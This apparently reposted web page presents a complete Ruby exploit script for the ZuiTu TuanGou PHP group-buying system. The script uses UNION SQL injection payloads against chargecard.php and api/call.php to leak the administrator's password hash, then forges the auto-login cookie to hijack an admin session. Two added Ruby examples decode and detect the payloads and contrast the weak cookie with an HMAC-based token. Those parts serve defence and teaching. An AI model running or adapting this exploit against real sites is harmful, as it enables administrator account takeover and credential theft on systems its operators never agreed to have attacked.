Source: 自学PHP网 (zixuephp.com) | Date: 2015-04-17 11:59
This time the hash is not retrieved by blind injection: the injected UNION row is echoed straight back in the response body.
require "net/http"
require "uri"
require "digest/md5"

doc = <<HERE
-------------------------------------------------------
ZuiTu TuanGou System Injection Exploit
Author:ztz www.2cto.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage = <<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} demo.zuitu.com 80 /
HERE

# Plain HTTP GET. Named fetch rather than send so it does not shadow
# Object#send. Returns the Net::HTTPResponse so callers can read either
# the body (the echoed injected row) or the headers (Set-Cookie).
def fetch(url, cookie = "")
  uri = URI(url)
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Get.new(uri.request_uri)
  request["Cookie"] = cookie unless cookie.empty?
  http.request(request)
end

# Strict base64 ("m0"): no trailing newline, which is not valid in a header.
def encode64(bin)
  [bin].pack("m0")
end

# UNION-based injection. "and 1=2" empties the original result set, so the
# only row returned is the injected one; concat(username,'=',password) sits
# in the column the page echoes back. exp2 is a second injectable endpoint
# with a different column count, tried if exp1 yields nothing.
def getpassword
  exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
  exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"
  # The password hash is the 32 hex chars echoed after "username=".
  $password = fetch(exp1).body.scan(/[0-9a-f]{32}/i).uniq
  if $password.empty?
    $password = fetch(exp2).body.scan(/[0-9a-f]{32}/i).uniq
  end
end

# Forge the site's auto-login cookie: name = first 4 hex chars of md5(host)
# + "_ru", value = base64("<uid>@<password hash>"); uid 1 is the
# administrator. The PHPSESSID the server sets in reply is the session to use.
def getsession
  cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
  cvalue = "1@" + $password.join
  $cookie = cname + "=" + encode64(cvalue)
  puts "[*]cookie: #{$cookie}"
  response = fetch("http://#{$host}:#{$port}/#{$path}index.php", $cookie)
  # Set-Cookie may be absent; to_s avoids a NoMethodError on nil.
  $session = response["Set-Cookie"].to_s.scan(/PHPSESSID=\w+;/).join
end

puts doc
if ARGV.length < 3
  puts usage
else
  $host, $port, $path = ARGV[0], ARGV[1], ARGV[2]
  puts "[*]get administrator's hash..."
  getpassword
  if $password.empty?
    puts "[-]Can't get administrator's hash..."
    exit 1
  end
  puts "[+]hash: #{$password.join}"
  puts "[*]Inject into cookie..."
  getsession
  if $session.empty?
    puts "[-]can't get cookie!"
    exit 1
  end
  puts "[+]set this cookie: #{$session}"
end
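To see what the two payloads in getpassword turn into once the target decodes them, here is an added example (not part of ztz's script) that percent-decodes the query string, collapses the /**/ comments the payload uses as whitespace, flags UNION SELECT fragments, and shows the statement that results under an assumed query template. The sample URLs are the ones the script would build for demo.zuitu.com, plus one benign request; the QUERY_TEMPLATE is a hypothetical reconstruction from the payload's leading "')", since the real chargecard.php source is not on this page.

```ruby
require "uri"

# Constructed sample requests: the two URLs the script above would build for
# host demo.zuitu.com, port 80, path "/", plus one benign request for contrast.
SAMPLE_REQUESTS = [
  "http://demo.zuitu.com:80//ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23",
  "http://demo.zuitu.com:80//api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23",
  "http://demo.zuitu.com:80//ajax/chargecard.php?action=query&secret=ABCD1234",
].freeze

# Hypothetical server-side statement, inferred only from the payload's leading
# "')" (it closes a quoted value inside parentheses). The real chargecard.php
# source is not on this page.
QUERY_TEMPLATE = "SELECT * FROM card WHERE secret=('{secret}') LIMIT 1"

# Split the query string and percent-decode each parameter ourselves, so the
# literal ";" inside the payload is not mistaken for a pair separator.
def decode_params(url)
  query = url.split("?", 2)[1].to_s
  query.split("&").map do |pair|
    k, v = pair.split("=", 2)
    [URI.decode_www_form_component(k), URI.decode_www_form_component(v.to_s)]
  end
end

# Turn the fragment into what the SQL parser sees: /**/ comments are
# whitespace, runs of whitespace collapse, and keywords are case-insensitive.
def normalize_sql_fragment(value)
  value.gsub(%r{/\*.*?\*/}m, " ").gsub(/\s+/, " ").strip.downcase
end

# A UNION injection survives normalization as "union [all] select".
def union_injection?(value)
  normalize_sql_fragment(value).match?(/\bunion\s+(?:all\s+)?select\b/)
end

# Parameters of a request whose decoded value carries a UNION injection.
def flag_request(url)
  decode_params(url).select { |_name, value| union_injection?(value) }
end

# The statement MySQL would execute: the payload's "#" comments out the rest
# of the line, so the template's closing "') LIMIT 1" is discarded, and
# "and 1=2" leaves only the injected row to be rendered.
def effective_sql(secret)
  full = normalize_sql_fragment(QUERY_TEMPLATE.sub("{secret}") { secret })
  full.split("#", 2).first.strip
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REQUESTS.each do |url|
    hits = flag_request(url)
    puts(hits.empty? ? "clean:   #{url[0, 60]}" : "FLAGGED: #{hits.map(&:first).join(',')}")
    hits.each { |_n, v| puts "  -> #{effective_sql(v)}" }
  end
end
```

The normalization step is the part worth keeping: a matcher that looks for "union select" in the raw URL misses this payload entirely, because every space has been replaced by a /**/ comment and the keywords are percent-encoded.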
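The cookie forged in getsession only works because the login cookie carries the raw password hash, so the hash the injection leaks is itself a credential. As an added example (not code from the original post or from the ZuiTu project), the following reproduces the exploit's cookie format, shows a remember-me check of the kind that format implies (reconstructed from the exploit's behaviour, not from the application's source), and puts a keyed HMAC token beside it that the leaked hash cannot satisfy. The user table, server key and host are constructed for the example.

```ruby
require "base64"
require "digest/md5"
require "openssl"

# Constructed user table: uid => md5(password), the value the injection leaks.
STORED_USERS = { "1" => Digest::MD5.hexdigest("constructed-admin-password") }.freeze

# The cookie exactly as getsession builds it: name is the first 4 hex chars of
# md5(host) + "_ru", value is base64("<uid>@<password hash>").
def forge_login_cookie(host, uid, password_hash)
  name = Digest::MD5.hexdigest(host)[0, 4] + "_ru"
  [name, Base64.strict_encode64("#{uid}@#{password_hash}")]
end

# Remember-me check of the kind the cookie format implies, reconstructed from
# the exploit's behaviour and NOT from the application's source: whoever knows
# the stored hash is logged in, so the injection alone is a full compromise.
def weak_cookie_login(cookie_value, users)
  uid, hash = Base64.strict_decode64(cookie_value).split("@", 2)
  users[uid] == hash ? uid : nil
rescue ArgumentError
  nil
end

# Hardened alternative (added here): uid and expiry, authenticated with an
# HMAC-SHA256 under a server-side key. The database hash never appears in the
# cookie, so leaking it no longer yields a session, and any edit is detected.
def issue_remember_token(uid, expires_at, key)
  payload = "#{uid}|#{expires_at}"
  mac = OpenSSL::HMAC.hexdigest("SHA256", key, payload)
  Base64.strict_encode64("#{payload}|#{mac}")
end

# Compare without an early exit on the first differing byte.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the uid for a genuine, unexpired token, nil otherwise.
def verify_remember_token(token, key, now)
  uid, expires_at, mac = Base64.strict_decode64(token).split("|", 3)
  return nil if mac.nil? || expires_at.to_i <= now
  expected = OpenSSL::HMAC.hexdigest("SHA256", key, "#{uid}|#{expires_at}")
  constant_time_equal?(mac, expected) ? uid : nil
rescue ArgumentError
  nil
end

if __FILE__ == $PROGRAM_NAME
  leaked = STORED_USERS["1"]
  name, value = forge_login_cookie("demo.zuitu.com", 1, leaked)
  puts "forged #{name}=#{value} -> weak check logs in uid #{weak_cookie_login(value, STORED_USERS).inspect}"
  key = "constructed-server-key"
  token = issue_remember_token("1", 2_000_000_000, key)
  puts "hmac token -> #{verify_remember_token(token, key, 1_700_000_000).inspect}"
  puts "leaked hash as token -> #{verify_remember_token(value, key, 1_700_000_000).inspect}"
end
```

The point of the second design is not the MAC algorithm but what is inside the cookie: once the remember-me value is derived from a server secret instead of from the stored hash, an SQL injection that reads the user table gives the attacker a hash to crack offline, not a session.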